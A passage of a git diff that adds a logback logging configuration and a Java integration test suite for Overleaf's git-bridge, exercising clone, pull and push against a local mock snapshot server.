0000000..343ae57 --- /dev/null +++ b/services/git-bridge/src/main/resources/logback.xml @@ -0,0 +1,35 @@ +<configuration> + + <variable name="LOG_LEVEL" value="${LOG_LEVEL:-INFO}" /> + + <!-- Log everything (subject to logger and root levels set below) to stdout. --> + <appender name="stdout" class="ch.qos.logback.core.ConsoleAppender"> + <target>System.out</target> + <filter class="ch.qos.logback.classic.filter.ThresholdFilter"> + <level>${LOG_LEVEL}</level> + </filter> + <encoder> + <pattern>%d{yyyy-MM-dd HH:mm:ss.SSS} %-5level [%thread] %logger{0}: %msg%n</pattern> + </encoder> + </appender> + + <!-- Log warnings and errors to stderr. We send them to a log aggregation service for monitoring. --> + <appender name="stderr" class="ch.qos.logback.core.ConsoleAppender"> + <target>System.err</target> + <filter class="ch.qos.logback.classic.filter.ThresholdFilter"> + <level>WARN</level> + </filter> + <encoder> + <pattern>%d{yyyy-MM-dd HH:mm:ss.SSS} %-5level [%thread] %logger{0}: %msg%n</pattern> + </encoder> + </appender> + + <!-- Set log levels for the application (or parts of the application). --> + <logger name="uk.ac.ic.wlgitbridge" level="${LOG_LEVEL}" /> + + <!-- The root log level determines how much our dependencies put in the logs. --> + <root level="WARN"> + <appender-ref ref="stdout" /> + <appender-ref ref="stderr" /> + </root> +</configuration> diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/application/WLGitBridgeIntegrationTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/application/WLGitBridgeIntegrationTest.java new file mode 100644 index 0000000..f706d98 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/application/WLGitBridgeIntegrationTest.java @@ -0,0 +1,1547 @@ +package uk.ac.ic.wlgitbridge.application; + +import static org.asynchttpclient.Dsl.*; +import static org.junit.Assert.*; + +import java.io.*; +import java.nio.charset.StandardCharsets; +import java.nio.file.Path; +import java.nio.file.Paths; +import java.util.Arrays; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.concurrent.ExecutionException; +import org.apache.commons.io.FileUtils; +import org.apache.commons.io.IOUtils; +import org.apache.http.HttpEntity; +import org.apache.http.HttpResponse; +import org.apache.http.ParseException; +import org.apache.http.client.ClientProtocolException; +import org.apache.http.client.HttpClient; +import org.apache.http.client.methods.HttpGet; +import org.apache.http.client.methods.HttpHead; +import org.apache.http.client.methods.HttpPost; +import org.apache.http.impl.client.HttpClients; +import org.apache.http.util.EntityUtils; +import org.asynchttpclient.*; +import org.eclipse.jgit.api.errors.GitAPIException; +import org.junit.After; +import org.junit.Before; +import org.junit.Rule; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; +import uk.ac.ic.wlgitbridge.bridge.swap.job.SwapJobConfig; +import uk.ac.ic.wlgitbridge.snapshot.servermock.server.MockSnapshotServer; +import uk.ac.ic.wlgitbridge.snapshot.servermock.state.SnapshotAPIState; +import uk.ac.ic.wlgitbridge.snapshot.servermock.state.SnapshotAPIStateBuilder; +import uk.ac.ic.wlgitbridge.snapshot.servermock.util.FileUtil; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 11/01/15. + */ +public class WLGitBridgeIntegrationTest { + + private Runtime runtime = Runtime.getRuntime(); + + private static final String PROJECT_ID = "000000000000000000000000"; + private static final String PROJECT_ID1 = "111111111111111111111111"; + private static final String PROJECT_ID2 = "222222222222222222222222"; + + private Map<String, Map<String, SnapshotAPIState>> states = + new HashMap<String, Map<String, SnapshotAPIState>>() { + { + put( + "canCloneARepository", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canCloneARepository/state/state.json")) + .build()); + } + }); + put( + "canCloneMultipleRepositories", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canCloneMultipleRepositories/state/state.json")) + .build()); + } + }); + put( + "cannotCloneAProtectedProjectWithoutAuthentication", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/cannotCloneAProtectedProjectWithoutAuthentication/state/state.json")) + .build()); + } + }); + put( + "cannotCloneA4xxProject", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/cannotCloneA4xxProject/state/state.json")) + .build()); + } + }); + put( + "cannotCloneAMissingProject", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/cannotCloneAMissingProject/state/state.json")) + .build()); + } + }); + put( + "canPullAModifiedTexFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullAModifiedTexFile/base/state.json")) + .build()); + put( + "withModifiedTexFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullAModifiedTexFile/withModifiedTexFile/state.json")) + .build()); + } + }); + put( + "canPullADeletedTexFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullADeletedTexFile/base/state.json")) + .build()); + put( + "withDeletedTexFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullADeletedTexFile/withDeletedTexFile/state.json")) + .build()); + } + }); + put( + "canPullAModifiedBinaryFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullAModifiedBinaryFile/base/state.json")) + .build()); + put( + "withModifiedBinaryFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullAModifiedBinaryFile/withModifiedBinaryFile/state.json")) + .build()); + } + }); + put( + "canPullADeletedBinaryFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullADeletedBinaryFile/base/state.json")) + .build()); + put( + "withDeletedBinaryFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullADeletedBinaryFile/withDeletedBinaryFile/state.json")) + .build()); + } + }); + put( + "canPullADuplicateBinaryFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullADuplicateBinaryFile/base/state.json")) + .build()); + put( + "withDuplicateBinaryFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullADuplicateBinaryFile/withDuplicateBinaryFile/state.json")) + .build()); + } + }); + put( + "canCloneDuplicateBinaryFiles", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canCloneDuplicateBinaryFiles/state/state.json")) + .build()); + } + }); + put( + "canPullUpdatedBinaryFiles", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullUpdatedBinaryFiles/base/state.json")) + .build()); + put( + "withUpdatedBinaryFiles", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/state.json")) + .build()); + } + }); + put( + "canPullAModifiedNestedFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullAModifiedNestedFile/base/state.json")) + .build()); + put( + "withModifiedNestedFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullAModifiedNestedFile/withModifiedNestedFile/state.json")) + .build()); + } + }); + put( + "canPullDeletedNestedFiles", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullDeletedNestedFiles/base/state.json")) + .build()); + put( + "withDeletedNestedFiles", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullDeletedNestedFiles/withDeletedNestedFiles/state.json")) + .build()); + } + }); + put( + "canPushFilesSuccessfully", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPushFilesSuccessfully/state/state.json")) + .build()); + } + }); + put( + "pushFailsOnFirstStageOutOfDate", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/pushFailsOnFirstStageOutOfDate/state/state.json")) + .build()); + } + }); + put( + "pushFailsOnSecondStageOutOfDate", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/pushFailsOnSecondStageOutOfDate/state/state.json")) + .build()); + } + }); + put( + "pushFailsOnInvalidFiles", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/pushFailsOnInvalidFiles/state/state.json")) + .build()); + } + }); + put( + "pushFailsOnInvalidProject", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/pushFailsOnInvalidProject/state/state.json")) + .build()); + } + }); + put( + "pushFailsOnUnexpectedError", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/pushFailsOnUnexpectedError/state/state.json")) + .build()); + } + }); + put( + "pushSucceedsAfterRemovingInvalidFiles", + new HashMap<String, SnapshotAPIState>() { + { + put( + "invalidState", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/pushSucceedsAfterRemovingInvalidFiles/invalidState/state.json")) + .build()); + put( + "validState", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/pushSucceedsAfterRemovingInvalidFiles/validState/state.json")) + .build()); + } + }); + put( + "canServePushedFiles", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canServePushedFiles/state/state.json")) + .build()); + } + }); + put( + "wlgbCanSwapProjects", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/wlgbCanSwapProjects/state/state.json")) + .build()); + } + }); + put( + "pushSubmoduleFailsWithInvalidGitRepo", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/pushSubmoduleFailsWithInvalidGitRepo/state/state.json")) + .build()); + } + }); + put( + "canMigrateRepository", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canMigrateRepository/state/state.json")) + .build()); + } + }); + put( + "skipMigrationWhenMigratedFromMissing", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/skipMigrationWhenMigratedFromMissing/state/state.json")) + .build()); + } + }); + put( + "canCloneAMigratedRepositoryWithoutChanges", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canCloneAMigratedRepositoryWithoutChanges/state/state.json")) + .build()); + } + }); + put( + "rejectV1Repository", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/rejectV1Repository/state/state.json")) + .build()); + } + }); + put( + "cannotCloneAHasDotGitProject", + new HashMap<String, SnapshotAPIState>() { + { + put( + "state", + new SnapshotAPIStateBuilder( + getResourceAsStream("/cannotCloneAHasDotGitProject/state/state.json")) + .build()); + } + }); + put( + "canPullIgnoredForceAddedFile", + new HashMap<String, SnapshotAPIState>() { + { + put( + "base", + new SnapshotAPIStateBuilder( + getResourceAsStream("/canPullIgnoredForceAddedFile/base/state.json")) + .build()); + put( + "withUpdatedMainFile", + new SnapshotAPIStateBuilder( + getResourceAsStream( + "/canPullIgnoredForceAddedFile/withUpdatedMainFile/state.json")) + .build()); + } + }); + } + }; + + @Rule public TemporaryFolder folder = new TemporaryFolder(); + + private MockSnapshotServer server; + private GitBridgeApp wlgb; + private File dir; + + @Before + public void setUp() throws Exception { + dir = folder.newFolder(); + } + + @After + public void tearDown() { + if (server != null) { + server.stop(); + } + if (wlgb != null) { + wlgb.stop(); + } + } + + private void gitConfig(File dir) throws IOException, InterruptedException { + assertEquals(0, runtime.exec("git config user.name TEST", null, dir).waitFor()); + assertEquals(0, runtime.exec("git config user.email test@test.com", null, dir).waitFor()); + assertEquals(0, runtime.exec("git config push.default matching", null, dir).waitFor()); + } + + private File gitClone(String repositoryName, int port, File dir) + throws IOException, InterruptedException { + String repo = "git clone http://git:password@127.0.0.1:" + port + "/" + repositoryName; + Process gitProcess = runtime.exec(repo, null, dir); + int exitCode = gitProcess.waitFor(); + if (exitCode != 0) { + System.err.println("git clone failed. Dumping stderr and stdout."); + System.err.println(IOUtils.toString(gitProcess.getErrorStream(), StandardCharsets.UTF_8)); + System.err.println(IOUtils.toString(gitProcess.getInputStream(), StandardCharsets.UTF_8)); + fail("git clone failed"); + } + File repositoryDir = new File(dir, repositoryName); + gitConfig(repositoryDir); + return repositoryDir; + } + + private void gitInit(File dir) throws IOException, InterruptedException { + assertEquals(0, runtime.exec("git init", null, dir).waitFor()); + gitConfig(dir); + } + + private void gitAdd(File dir) throws IOException, InterruptedException { + assertEquals(0, runtime.exec("git add -A", null, dir).waitFor()); + } + + private void gitCommit(File dir, String msg) throws IOException, InterruptedException { + assertEquals(0, runtime.exec("git commit -m \"" + msg + "\"", null, dir).waitFor()); + } + + private Process gitPush(File dir) throws IOException, InterruptedException { + return gitPush(dir, 0); + } + + private Process gitPush(File dir, int exit) throws IOException, InterruptedException { + Process ret = runtime.exec("git push", null, dir); + assertEquals(exit, ret.waitFor()); + return ret; + } + + private void gitPull(File dir) throws IOException, InterruptedException { + assertEquals(0, runtime.exec("git pull", null, dir).waitFor()); + } + + @Test + public void canCloneARepository() throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3857, getResource("/canCloneARepository").toFile()); + server.start(); + server.setState(states.get("canCloneARepository").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33857, 3857)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33857, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canCloneARepository/state/" + PROJECT_ID), testprojDir.toPath())); + } + + @Test + public void canCloneMultipleRepositories() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3858, getResource("/canCloneMultipleRepositories").toFile()); + server.start(); + server.setState(states.get("canCloneMultipleRepositories").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33858, 3858)}); + wlgb.run(); + File testproj1Dir = gitClone(PROJECT_ID1, 33858, dir); + File testproj2Dir = gitClone(PROJECT_ID2, 33858, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canCloneMultipleRepositories/state/" + PROJECT_ID1), + testproj1Dir.toPath())); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canCloneMultipleRepositories/state/" + PROJECT_ID2), + testproj2Dir.toPath())); + } + + @Test + public void canPullAModifiedTexFile() throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3859, getResource("/canPullAModifiedTexFile").toFile()); + server.start(); + server.setState(states.get("canPullAModifiedTexFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33859, 3859)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33859, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullAModifiedTexFile/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullAModifiedTexFile").get("withModifiedTexFile")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullAModifiedTexFile/withModifiedTexFile/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullADeletedTexFile() throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3860, getResource("/canPullADeletedTexFile").toFile()); + server.start(); + server.setState(states.get("canPullADeletedTexFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33860, 3860)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33860, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullADeletedTexFile/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullADeletedTexFile").get("withDeletedTexFile")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullADeletedTexFile/withDeletedTexFile/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullAModifiedBinaryFile() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3862, getResource("/canPullAModifiedBinaryFile").toFile()); + server.start(); + server.setState(states.get("canPullAModifiedBinaryFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33862, 3862)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33862, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullAModifiedBinaryFile/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullAModifiedBinaryFile").get("withModifiedBinaryFile")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullAModifiedBinaryFile/withModifiedBinaryFile/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullADeletedBinaryFile() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3863, getResource("/canPullADeletedBinaryFile").toFile()); + server.start(); + server.setState(states.get("canPullADeletedBinaryFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33863, 3863)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33863, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullADeletedBinaryFile/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullADeletedBinaryFile").get("withDeletedBinaryFile")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullADeletedBinaryFile/withDeletedBinaryFile/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullADuplicateBinaryFile() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(4001, getResource("/canPullADuplicateBinaryFile").toFile()); + server.start(); + server.setState(states.get("canPullADuplicateBinaryFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(44001, 4001)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 44001, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullADuplicateBinaryFile/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullADuplicateBinaryFile").get("withDuplicateBinaryFile")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullADuplicateBinaryFile/withDuplicateBinaryFile/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canCloneDuplicateBinaryFiles() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(4002, getResource("/canCloneDuplicateBinaryFiles").toFile()); + server.start(); + server.setState(states.get("canCloneDuplicateBinaryFiles").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(44002, 4002)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 44002, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canCloneDuplicateBinaryFiles/state/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullUpdatedBinaryFiles() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(4003, getResource("/canPullUpdatedBinaryFiles").toFile()); + server.start(); + server.setState(states.get("canPullUpdatedBinaryFiles").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(44003, 4003)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 44003, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullUpdatedBinaryFiles/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullUpdatedBinaryFiles").get("withUpdatedBinaryFiles")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullAModifiedNestedFile() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3864, getResource("/canPullAModifiedNestedFile").toFile()); + server.start(); + server.setState(states.get("canPullAModifiedNestedFile").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33864, 3864)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33864, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullAModifiedNestedFile/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullAModifiedNestedFile").get("withModifiedNestedFile")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullAModifiedNestedFile/withModifiedNestedFile/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPullDeletedNestedFiles() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3865, getResource("/canPullDeletedNestedFiles").toFile()); + server.start(); + server.setState(states.get("canPullDeletedNestedFiles").get("base")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33865, 3865)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33865, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullDeletedNestedFiles/base/" + PROJECT_ID), testprojDir.toPath())); + server.setState(states.get("canPullDeletedNestedFiles").get("withDeletedNestedFiles")); + gitPull(testprojDir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPullDeletedNestedFiles/withDeletedNestedFiles/" + PROJECT_ID), + testprojDir.toPath())); + } + + @Test + public void canPushFilesSuccessfully() throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3866, getResource("/canPushFilesSuccessfully").toFile()); + server.start(); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33866, 3866)}); + wlgb.run(); + server.setState(states.get("canPushFilesSuccessfully").get("state")); + File testprojDir = gitClone(PROJECT_ID, 33866, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/canPushFilesSuccessfully/state/" + PROJECT_ID), testprojDir.toPath())); + assertEquals(0, runtime.exec("touch push.tex", null, testprojDir).waitFor()); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + gitPush(testprojDir); + } + + private static final String EXPECTED_OUT_PUSH_OUT_OF_DATE_FIRST = + "error: failed to push some refs to 'http://127.0.0.1:33867/" + + PROJECT_ID + + "'\n" + + "hint: Updates were rejected because the tip of your current branch is behind\n" + + "hint: its remote counterpart. Integrate the remote changes (e.g.\n" + + "hint: 'git pull ...') before pushing again.\n" + + "hint: See the 'Note about fast-forwards' in 'git push --help' for details.\n"; + + @Test + public void pushFailsOnFirstStageOutOfDate() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3867, getResource("/pushFailsOnFirstStageOutOfDate").toFile()); + server.start(); + server.setState(states.get("pushFailsOnFirstStageOutOfDate").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33867, 3867)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33867, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/pushFailsOnFirstStageOutOfDate/state/" + PROJECT_ID), + testprojDir.toPath())); + runtime.exec("touch push.tex", null, testprojDir).waitFor(); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + assertEquals(EXPECTED_OUT_PUSH_OUT_OF_DATE_FIRST, Util.fromStream(push.getErrorStream(), 2)); + } + + private static final String EXPECTED_OUT_PUSH_OUT_OF_DATE_SECOND = + "error: failed to push some refs to 'http://127.0.0.1:33868/" + + PROJECT_ID + + "'\n" + + "hint: Updates were rejected because the tip of your current branch is behind\n" + + "hint: its remote counterpart. Integrate the remote changes (e.g.\n" + + "hint: 'git pull ...') before pushing again.\n" + + "hint: See the 'Note about fast-forwards' in 'git push --help' for details.\n"; + + @Test + public void pushFailsOnSecondStageOutOfDate() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3868, getResource("/pushFailsOnSecondStageOutOfDate").toFile()); + server.start(); + server.setState(states.get("pushFailsOnSecondStageOutOfDate").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33868, 3868)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33868, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/pushFailsOnSecondStageOutOfDate/state/" + PROJECT_ID), + testprojDir.toPath())); + runtime.exec("touch push.tex", null, testprojDir).waitFor(); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + assertEquals(EXPECTED_OUT_PUSH_OUT_OF_DATE_SECOND, Util.fromStream(push.getErrorStream(), 2)); + } + + private static final List<String> EXPECTED_OUT_PUSH_INVALID_FILES = + Arrays.asList( + "remote: hint: You have 4 invalid files in your Overleaf project:", + "remote: hint: file1.invalid (error)", + "remote: hint: file2.exe (invalid file extension)", + "remote: hint: hello world.png (rename to: hello_world.png)", + "remote: hint: an image.jpg (rename to: an_image.jpg)", + "To http://127.0.0.1:33869/" + PROJECT_ID, + "! [remote rejected] master -> master (invalid files)", + "error: failed to push some refs to 'http://127.0.0.1:33869/" + PROJECT_ID + "'"); + + @Test + public void pushFailsOnInvalidFiles() throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3869, getResource("/pushFailsOnInvalidFiles").toFile()); + server.start(); + server.setState(states.get("pushFailsOnInvalidFiles").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33869, 3869)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33869, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/pushFailsOnInvalidFiles/state/" + PROJECT_ID), testprojDir.toPath())); + runtime.exec("touch push.tex", null, testprojDir).waitFor(); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + List<String> actual = Util.linesFromStream(push.getErrorStream(), 2, "[K"); + assertEquals(EXPECTED_OUT_PUSH_INVALID_FILES, actual); + } + + private static final List<String> EXPECTED_OUT_PUSH_INVALID_PROJECT = + Arrays.asList( + "remote: hint: project: no main file", + "remote: hint: The project would have no (editable) main .tex file.", + "To http://127.0.0.1:33870/" + PROJECT_ID, + "! [remote rejected] master -> master (invalid project)", + "error: failed to push some refs to 'http://127.0.0.1:33870/" + PROJECT_ID + "'"); + + @Test + public void pushFailsOnInvalidProject() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3870, getResource("/pushFailsOnInvalidProject").toFile()); + server.start(); + server.setState(states.get("pushFailsOnInvalidProject").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33870, 3870)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33870, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/pushFailsOnInvalidProject/state/" + PROJECT_ID), testprojDir.toPath())); + runtime.exec("touch push.tex", null, testprojDir).waitFor(); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + List<String> actual = Util.linesFromStream(push.getErrorStream(), 2, "[K"); + assertEquals(EXPECTED_OUT_PUSH_INVALID_PROJECT, actual); + } + + private static final List<String> EXPECTED_OUT_PUSH_UNEXPECTED_ERROR = + Arrays.asList( + "remote: hint: There was an internal error with the Overleaf server.", + "remote: hint: Please contact Overleaf.", + "To http://127.0.0.1:33871/" + PROJECT_ID, + "! [remote rejected] master -> master (Overleaf error)", + "error: failed to push some refs to 'http://127.0.0.1:33871/" + PROJECT_ID + "'"); + + /* this one prints a stack trace */ + @Test + public void pushFailsOnUnexpectedError() + throws IOException, GitAPIException, InterruptedException { + server = new MockSnapshotServer(3871, getResource("/pushFailsOnUnexpectedError").toFile()); + server.start(); + server.setState(states.get("pushFailsOnUnexpectedError").get("state")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33871, 3871)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33871, dir); + assertTrue( + FileUtil.gitDirectoriesAreEqual( + getResource("/pushFailsOnUnexpectedError/state/" + PROJECT_ID), testprojDir.toPath())); + runtime.exec("touch push.tex", null, testprojDir).waitFor(); + gitAdd(testprojDir); + gitCommit(testprojDir, "push"); + Process push = gitPush(testprojDir, 1); + List<String> actual = Util.linesFromStream(push.getErrorStream(), 2, "[K"); + assertEquals(EXPECTED_OUT_PUSH_UNEXPECTED_ERROR, actual); + } + + private static final List<String> EXPECTED_OUT_PUSH_INVALID_EXE_FILE = + Arrays.asList( + "remote: error: invalid files", + "remote:", + "remote: hint: You have 1 invalid files in your Overleaf project:", + "remote: hint: file1.exe (invalid file extension)", + "To http://127.0.0.1:33872/" + PROJECT_ID, + "! [remote rejected] master -> master (invalid files)", + "error: failed to push some refs to 'http://127.0.0.1:33872/" + PROJECT_ID + "'"); + + @Test + public void pushSucceedsAfterRemovingInvalidFiles() + throws IOException, GitAPIException, InterruptedException { + server = + new MockSnapshotServer( + 3872, getResource("/pushSucceedsAfterRemovingInvalidFiles").toFile()); + server.start(); + server.setState(states.get("pushSucceedsAfterRemovingInvalidFiles").get("invalidState")); + wlgb = new GitBridgeApp(new String[] {makeConfigFile(33872, 3872)}); + wlgb.run(); + File testprojDir = gitClone(PROJECT_ID, 33872, dir); + + // try to push invalid file; it should fail + assertTrue( + FileUtil.gitDirectoriesAreEqual( + 